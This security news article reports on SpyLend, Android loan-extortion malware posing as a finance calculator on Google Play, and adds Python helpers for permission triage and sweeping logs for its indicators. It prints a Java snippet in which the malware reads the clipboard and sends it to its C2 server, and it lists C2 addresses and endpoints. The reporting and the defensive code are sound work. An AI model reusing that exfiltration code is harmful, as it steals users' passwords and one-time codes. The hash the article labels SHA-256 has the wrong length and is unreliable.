A sophisticated Android malware campaign dubbed “SpyLend” has infiltrated the Google Play Store, masquerading as a financial utility app to target Indian users.
Disguised as “Finance Simplified” (package: com.someca.count), the app has amassed over 100,000 downloads since February 2025, leveraging its official platform presence to bypass user suspicion.
Cybersecurity firm CYFIRMA uncovered the operation, revealing a multi-layered attack designed to harvest sensitive data, deploy predatory loan services, and extort victims through blackmail.
The app initially presents itself as a legitimate finance calculator but dynamically alters its interface based on the user’s geolocation.
For Indian users, it launches a WebView component loading content from adv[.]rp5[.]org, a domain hosting unauthorized loan applications.
These loan services, such as KreditApple and MoneyApe, operate outside the Play Store’s scrutiny, redirecting victims to external Amazon EC2 servers to download malicious APKs (KreditApple.apk with SHA-256 fa27aa603eb6807dbc60d5dadc5b8f9b9290099f).
Security researchers noted that once installed, SpyLend requests invasive permissions, including access to call logs, SMS, contacts, and the clipboard, under the guise of identity verification.
Users reporting harassment and blackmail cite threats involving manipulated photos, fake nude images, and demands for payment.
Negative reviews on the Play Store highlight complaints of data misuse, though the app remains available as of February 24, 2025.
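The permission audit that users and analysts are advised to perform can be partly automated. The following is an added example, not CYFIRMA's or the article's code: it parses the text printed by `aapt dump permissions <apk>` and flags permissions that expose the data categories the article says SpyLend harvests (SMS, call logs, contacts, location, installed apps) in an app that claims to be a finance calculator. The sample dump, the package name in it, the category labels and the "expected for a calculator" set are all this example's own constructed assumptions.

```python
"""Triage helper: flag permissions a self-described finance calculator has no business requesting.

Added example (not CYFIRMA's or the article's code). It parses `aapt dump permissions` output
and compares the requested permissions with the data categories named in the article.
The sample dumps below are constructed, not taken from the real app.
"""
import re
from typing import Dict, List

# Android permission names that unlock the data categories the article describes.
# The category labels on the right are this example's own grouping (an assumption).
SENSITIVE = {
    "android.permission.READ_SMS": "sms",
    "android.permission.RECEIVE_SMS": "sms",
    "android.permission.READ_CALL_LOG": "call_log",
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.ACCESS_COARSE_LOCATION": "location",
    "android.permission.QUERY_ALL_PACKAGES": "installed_apps",
    "android.permission.READ_PHONE_STATE": "device_identity",
}

# Permissions a stand-alone calculator could plausibly justify (assumed baseline).
EXPECTED_FOR_CALCULATOR = {
    "android.permission.INTERNET",
    "android.permission.ACCESS_NETWORK_STATE",
}

# Accepts both "uses-permission: name='X'" (current aapt) and "uses-permission: X" (older aapt).
_PERM_RE = re.compile(r"^uses-permission:\s*(?:name=')?([A-Za-z0-9_.]+)'?", re.MULTILINE)
_PKG_RE = re.compile(r"^package:\s*([A-Za-z0-9_.]+)", re.MULTILINE)

# Constructed sample dumps (hypothetical package names, not the real app).
SUSPICIOUS_DUMP = """package: com.example.calc.sample
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.QUERY_ALL_PACKAGES'
uses-permission: android.permission.WAKE_LOCK
"""

BENIGN_DUMP = """package: com.example.calc.benign
uses-permission: name='android.permission.INTERNET'
"""


def parse_aapt_permissions(dump: str) -> Dict[str, object]:
    """Return the package name and the de-duplicated, sorted permission list from an aapt dump."""
    pkg = _PKG_RE.search(dump)
    return {
        "package": pkg.group(1) if pkg else None,
        "permissions": sorted(set(_PERM_RE.findall(dump))),
    }


def triage(dump: str) -> Dict[str, object]:
    """Classify an APK's permission set against what a finance calculator should need."""
    info = parse_aapt_permissions(dump)
    findings: List[Dict[str, str]] = [
        {"permission": p, "exposes": SENSITIVE[p]} for p in info["permissions"] if p in SENSITIVE
    ]
    categories = sorted({f["exposes"] for f in findings})
    # Permissions that are neither sensitive nor in the calculator baseline: worth a look, not a red flag.
    unexplained = sorted(
        p for p in info["permissions"] if p not in SENSITIVE and p not in EXPECTED_FOR_CALCULATOR
    )
    # Decision rule (assumption): two or more sensitive data categories in a calculator is a spyware candidate.
    if len(categories) >= 2:
        verdict = "spyware_candidate"
    elif categories:
        verdict = "review"
    else:
        verdict = "consistent"
    return {
        "package": info["package"],
        "verdict": verdict,
        "sensitive_categories": categories,
        "findings": findings,
        "unexplained": unexplained,
    }


if __name__ == "__main__":
    for dump in (SUSPICIOUS_DUMP, BENIGN_DUMP):
        result = triage(dump)
        print(result["package"], result["verdict"], result["sensitive_categories"])
```

On the constructed suspicious dump the helper reports five sensitive data categories and the verdict `spyware_candidate`; the benign dump, requesting only INTERNET, is reported as `consistent`. The same parser works on the real `aapt dump permissions` output for any APK pulled from a device.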
Technical Exploitation and Command Infrastructure
The malware’s operational backbone lies in its abuse of Android’s WebView API and a custom command-and-control (C2) server.
By dynamically injecting JavaScript code, SpyLend fetches loan application listings via endpoints such as app/product/app/list and app/loan/config.
These APIs deliver loan parameters (interest rates, repayment methods) and track user interactions through app/user/saveVisitor, exfiltrating device metadata and behavioral analytics.
A critical evasion tactic involves hosting loan apps on Amazon EC2 instances, bypassing Play Store vetting. The APKs employ persistence mechanisms like JobInfoSchedularService and AlarmManagerSchedularBroadcastReceiver, which run background tasks to maintain access.
The malware also harvests clipboard data every 3 seconds using ClipboardManager, capturing passwords, credit card details, and OTPs:

```java
// Clipboard monitoring code snippet (as reported; HttpClient.post and C2_ENDPOINT are the
// report's shorthand for the malware's own transport helper and server address)
ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
ClipData clip = clipboard.getPrimaryClip();
String clipboardData = clip.getItemAt(0).getText().toString();
// Exfiltrates data to C2 via JSON
JSONObject exfilData = new JSONObject();
exfilData.put("clipboard", clipboardData);
HttpClient.post(C2_ENDPOINT, exfilData);
```
The C2 infrastructure (16[.]163[.]9[.]142) uses endpoints like /admin/file/upload to receive stolen SMS, call logs, and app lists. Admin panels analyzed by CYFIRMA contain Chinese-language scripts (zh.js), suggesting threat actor origins.
Data exfiltration spans:

- GPS coordinates (updated every 3 seconds via LocationManager).
- Installed apps and installation timestamps (using PackageManager).
- SMS content queried via the content://sms/ URI.
Despite Google’s Play Protect safeguards, SpyLend’s use of WebView-delivered content allows real-time payload updates, evading static analysis.
CYFIRMA’s YARA rules (detecting hashes like 95a44305f9162352eddbb31e3ea03d7e) and MITRE ATT&CK mappings emphasize defense evasion (T1628) and credential access (T1414).
Users are urged to audit app permissions, avoid third-party APKs, and monitor for suspicious behavior. Enterprise recommendations include deploying endpoint detection tools and blacklisting IOCs like moneyape[.]org.
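Blacklisting the published IOCs is only useful if they are also checked against what the fleet already did. The following is an added example, not CYFIRMA's or the article's code, that takes the indicators exactly as printed above (the two defanged domains, the C2 IP, the package name and the two hash values, reproduced as the page gives them) and sweeps them across DNS, proxy and endpoint log lines. The log lines are constructed for this example; the domain matcher also catches subdomains of an indicator (so www.moneyape.org is a hit) while rejecting look-alikes such as notmoneyape.org.

```python
"""Sweep the SpyLend indicators published in the article across DNS/proxy/endpoint logs.

Added example (not CYFIRMA's or the article's code). Indicators are kept in their
defanged form so the list can be pasted around safely and are refanged at match time.
The sample log lines are constructed; nothing in them comes from a real environment.
"""
import re
from typing import Dict, List

# Indicators as printed in the article. Hash values are reproduced as published.
DEFANGED_IOCS: Dict[str, List[str]] = {
    "domain": ["adv[.]rp5[.]org", "moneyape[.]org"],
    "ip": ["16[.]163[.]9[.]142"],
    "hash": ["fa27aa603eb6807dbc60d5dadc5b8f9b9290099f", "95a44305f9162352eddbb31e3ea03d7e"],
    "package": ["com.someca.count"],
}

# Constructed sample log lines (DNS, proxy and an endpoint install event).
SAMPLE_LOGS = [
    "2025-02-24T10:01:12Z dns client=10.0.4.21 query=adv.rp5.org type=A",
    "2025-02-24T10:01:13Z proxy client=10.0.4.21 method=GET url=http://16.163.9.142/app/loan/config status=200",
    "2025-02-24T10:02:40Z proxy client=10.0.4.33 method=GET url=https://www.example.com/finance/calc status=200",
    "2025-02-24T10:03:05Z edr host=phone-21 event=install package=com.someca.count hash=FA27AA603EB6807DBC60D5DADC5B8F9B9290099F",
    "2025-02-24T10:04:00Z dns client=10.0.4.33 query=notmoneyape.org type=A",
    "2025-02-24T10:05:11Z dns client=10.0.4.21 query=www.moneyape.org type=A",
]


def refang(value: str) -> str:
    """Turn a defanged indicator ('[.]', 'hxxp') back into its literal form."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def _pattern(kind: str, value: str) -> "re.Pattern[str]":
    """Build a matcher that avoids partial-token false positives for each indicator type."""
    esc = re.escape(value)
    if kind == "domain":
        # Exact host or any subdomain of it; a longer label such as 'notmoneyape.org' must not match.
        return re.compile(r"(?<![\w-])(?:[\w-]+\.)*" + esc + r"(?![\w-])", re.IGNORECASE)
    if kind == "ip":
        # Do not let 16.163.9.142 match inside 116.163.9.1420 or similar.
        return re.compile(r"(?<![\d.])" + esc + r"(?![\d.])")
    if kind == "hash":
        # Hashes are logged in either case; require hex-token boundaries.
        return re.compile(r"(?<![0-9a-f])" + esc + r"(?![0-9a-f])", re.IGNORECASE)
    # Package names and anything else: plain word boundaries.
    return re.compile(r"(?<!\w)" + esc + r"(?!\w)")


def match_iocs(lines: List[str], iocs: Dict[str, List[str]] = DEFANGED_IOCS) -> List[Dict[str, object]]:
    """Return one hit record per (line, indicator) pair found in the log lines."""
    matchers = [
        (kind, original, _pattern(kind, refang(original)))
        for kind, values in iocs.items()
        for original in values
    ]
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        for kind, original, rx in matchers:
            m = rx.search(line)
            if m:
                hits.append({"line": lineno, "kind": kind, "indicator": original, "evidence": m.group(0)})
    return hits


def hit_lines(hits: List[Dict[str, object]]) -> List[int]:
    """Distinct, sorted line numbers that matched at least one indicator."""
    return sorted({int(h["line"]) for h in hits})


if __name__ == "__main__":
    for h in match_iocs(SAMPLE_LOGS):
        print(f"line {h['line']:>2}  {h['kind']:<8} {h['indicator']:<45} -> {h['evidence']}")
```

Against the constructed lines the sweep yields five hits on four lines: the DNS query for adv.rp5.org, the proxy request to the C2 address, the install event (both the package name and the hash), and the www.moneyape.org lookup; the look-alike notmoneyape.org and the unrelated proxy line produce nothing. The indicators stay in their defanged form in the record, so the output can be copied straight into a ticket.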
As financial malware evolves, collaborative efforts between app stores and cybersecurity entities remain critical to disrupting these threats.